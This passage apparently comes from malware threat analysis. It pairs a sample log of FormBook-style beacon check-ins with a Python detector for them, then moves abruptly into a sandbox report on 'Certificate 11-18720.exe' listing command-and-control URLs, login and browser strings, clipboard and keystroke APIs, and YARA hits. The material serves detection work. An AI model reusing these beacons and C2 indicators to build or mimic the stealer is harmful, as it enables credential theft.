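2024-11-25T18:12:20\t192.168.2.4\tGET\twww.goldenjade-travel.com\t/fo8o/?7BpTBrLp=LFKqyrcu7g1NCa8bLlrIs+M38ZMJrQSprIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2zMIkigvi6pIX6i8MuAeXHNrENDnI2WJi/4=&3vjHf=mRWd\tMozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)
2024-11-25T18:12:25\t192.168.2.4\tPOST\twww.goldenjade-travel.com\t/fo8o/\tMozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)
2024-11-25T18:13:40\t192.168.2.4\tGET\twww.magmadokum.com\t/fo8o/?7BpTBrLp=qL3nKp+YSjoaTomnOzyxpXPFUBhLgkHGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjKFgJSPFkq5dbaCOx4WcoETVBbNsEZyvIPzk=&3vjHf=mRWd\tMozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)
2024-11-25T18:13:55\t192.168.2.4\tGET\twww.rssnewscast.com\t/fo8o/?7BpTBrLp=x3jV/ECx7FuzXOI+5yB0DB/+zmAHn47HyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNuo48jXK1aHHk/BJwdjwjaHe/B0IWhwIR9Wc=&3vjHf=mRWd\tMozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)
2024-11-25T18:13:50\t192.168.2.9\tGET\twww.example.org\t/index.html\tMozilla/5.0 (Windows NT 10.0; Win64; x64)
2024-11-25T18:14:00\t192.168.2.9\tGET\twww.example.net\t/search?q=formbook&page=2\tMozilla/5.0 (Windows NT 10.0; Win64; x64)
"""


@dataclass
class Request:
    ts: datetime
    client: str
    method: str
    host: str
    path: str
    params: list[tuple[str, str]]
    user_agent: str


@dataclass
class Finding:
    client: str
    path: str
    hosts: list[str]        # distinct hosts beaconed with the check-in shape
    posted_to: list[str]    # hosts that then received a POST to the same path
    indicators: list[str]


def parse_log(text: str) -> list[Request]:
    reqs = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, method, host, uri, ua = line.split("\t")
        u = urlsplit(uri)
        reqs.append(Request(datetime.fromisoformat(ts), client, method, host,
                            u.path, parse_qsl(u.query, keep_blank_values=True), ua))
    return reqs


def checkin_shape(params: list[tuple[str, str]]) -> bool:
    """Exactly two parameters: one long opaque blob and one short tag."""
    if len(params) != 2:
        return False
    short, long_ = sorted(len(v) for _, v in params)
    return short <= 8 and long_ >= 64


def find_checkins(reqs: list[Request], min_hosts: int = 3,
                  window: timedelta = timedelta(minutes=10)) -> list[Finding]:
    # Group candidate GETs by client, path and parameter names; a beacon keeps
    # these fixed while rotating the Host header through its domain list.
    groups: dict[tuple, list[Request]] = defaultdict(list)
    posts: dict[tuple[str, str], set[str]] = defaultdict(set)
    for r in reqs:
        if r.method == "POST":
            posts[(r.client, r.path)].add(r.host)
        elif r.method == "GET" and checkin_shape(r.params):
            names = tuple(sorted(k for k, _ in r.params))
            groups[(r.client, r.path, names)].append(r)

    findings = []
    for (client, path, _names), gets in groups.items():
        gets.sort(key=lambda r: r.ts)
        # Sliding window: did enough distinct hosts get hit within `window`?
        burst = any(
            len({g.host for g in gets[i:] if g.ts - gets[i].ts <= window}) >= min_hosts
            for i in range(len(gets))
        )
        if not burst:
            continue
        hosts = sorted({g.host for g in gets})
        indicators = [f"{len(hosts)} hosts share path {path} with identical parameter names"]
        if any("MSIE 8.0" in g.user_agent for g in gets):
            indicators.append("legacy IE8 User-Agent string")
        posted = sorted(posts.get((client, path), set()) & set(hosts))
        if posted:
            indicators.append("follow-up POST to the same path")
        findings.append(Finding(client, path, hosts, posted, indicators))
    return findings


if __name__ == "__main__":
    for f in find_checkins(parse_log(SAMPLE_LOG)):
        print(f)
```

The host-rotation burst is the discriminating signal; the User-Agent and the POST are reported as supporting indicators only, since a legitimate legacy client can send the first and any form submission produces the second. Keep the path and parameter names out of the rule itself: they are the values the Emerging Threats signature above is free to hard-code per variant, but a structural detector survives the next build.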
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Mon, 25 Nov 2024 17:11:46 GMT | Content-Type: text/html | Content-Length: 548 | Connection: close | Body (ASCII; the raw hex dump of the same bytes is omitted): <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html> followed by six copies of <!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html; charset=us-ascii | Server: Microsoft-HTTPAPI/2.0 | Date: Mon, 25 Nov 2024 17:12:12 GMT | Connection: close | Content-Length: 315 | Body (ASCII): <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html; charset=us-ascii | Server: Microsoft-HTTPAPI/2.0 | Date: Mon, 25 Nov 2024 17:12:17 GMT | Connection: close | Content-Length: 315 | Body (ASCII): identical to the preceding Microsoft-HTTPAPI/2.0 response
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html; charset=us-ascii | Server: Microsoft-HTTPAPI/2.0 | Date: Mon, 25 Nov 2024 17:12:20 GMT | Connection: close | Content-Length: 315 | Body (ASCII): identical to the preceding Microsoft-HTTPAPI/2.0 response
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 25 Nov 2024 17:14:15 GMT | Server: Apache | Content-Length: 493 | Connection: close | Content-Type: text/html | Body (ASCII): <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div 
class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 17:14:17 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div 
class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 17:14:20 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div 
class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 17:14:23 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div 
class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 17:14:35 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 17:14:38 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 17:14:40 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 17:14:43 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
            Source: AQvzsYASIFuMivlIGfCCjBw.exe, 00000007.00000002.4137332421.0000000004A63000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.empowermedeco.com
            Source: AQvzsYASIFuMivlIGfCCjBw.exe, 00000007.00000002.4137332421.0000000004A63000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.empowermedeco.com/fo8o/
            Source: netbtugc.exe, 00000003.00000003.2035358535.00000000077DD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: netbtugc.exe, 00000003.00000003.2035358535.00000000077DD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: netbtugc.exe, 00000003.00000003.2035358535.00000000077DD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: netbtugc.exe, 00000003.00000003.2035358535.00000000077DD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: netbtugc.exe, 00000003.00000002.4136427268.0000000004212000.00000004.10000000.00040000.00000000.sdmp, AQvzsYASIFuMivlIGfCCjBw.exe, 00000007.00000002.4135878729.00000000034B2000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
            Source: netbtugc.exe, 00000003.00000002.4136427268.0000000004212000.00000004.10000000.00040000.00000000.sdmp, AQvzsYASIFuMivlIGfCCjBw.exe, 00000007.00000002.4135878729.00000000034B2000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
            Source: netbtugc.exe, 00000003.00000003.2035358535.00000000077DD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: netbtugc.exe, 00000003.00000003.2035358535.00000000077DD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: netbtugc.exe, 00000003.00000003.2035358535.00000000077DD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: netbtugc.exe, 00000003.00000002.4134914771.000000000076B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth%y
            Source: netbtugc.exe, 00000003.00000002.4134914771.000000000076B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: netbtugc.exe, 00000003.00000002.4134914771.000000000076B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: netbtugc.exe, 00000003.00000002.4134914771.000000000076B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf
            Source: netbtugc.exe, 00000003.00000002.4134914771.000000000076B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: netbtugc.exe, 00000003.00000002.4134914771.000000000076B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: netbtugc.exe, 00000003.00000002.4134914771.000000000076B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: netbtugc.exe, 00000003.00000003.2030686300.00000000077B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: netbtugc.exe, 00000003.00000003.2035358535.00000000077DD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
            Source: netbtugc.exe, 00000003.00000002.4136427268.000000000485A000.00000004.10000000.00040000.00000000.sdmp, AQvzsYASIFuMivlIGfCCjBw.exe, 00000007.00000002.4135878729.0000000003AFA000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.empowermedeco.com/fo8o/?7BpTBrLp=mxnR
            Source: netbtugc.exe, 00000003.00000003.2035358535.00000000077DD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: netbtugc.exe, 00000003.00000002.4136427268.0000000003EEE000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4137916107.0000000005D90000.00000004.00000800.00020000.00000000.sdmp, AQvzsYASIFuMivlIGfCCjBw.exe, 00000007.00000002.4135878729.000000000318E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_
            Source: AQvzsYASIFuMivlIGfCCjBw.exe, 00000007.00000002.4135878729.000000000318E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.sedo.com/services/parking.php3
            Source: C:\Users\user\Desktop\Certificate 11-18720.exe Code function: 0_2_00616B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00616B0C
            Source: C:\Users\user\Desktop\Certificate 11-18720.exe Code function: 0_2_00616D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00616D07
            Source: C:\Users\user\Desktop\Certificate 11-18720.exe Code function: 0_2_00616B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00616B0C
            Source: C:\Users\user\Desktop\Certificate 11-18720.exe Code function: 0_2_00602B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00602B37
            Source: C:\Users\user\Desktop\Certificate 11-18720.exe Code function: 0_2_0062F7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0062F7FF

            E-Banking Fraud

            Source: Yara match File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 00000003.00000002.4134816430.00000000006E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000002.4135693303.0000000000940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000001.00000002.1849387117.0000000000E60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000007.00000002.4137332421.0000000004A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000002.4134520381.0000000000450000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000001.00000002.1849178523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000002.00000002.4135588115.0000000005950000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000001.00000002.1850001201.0000000006D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

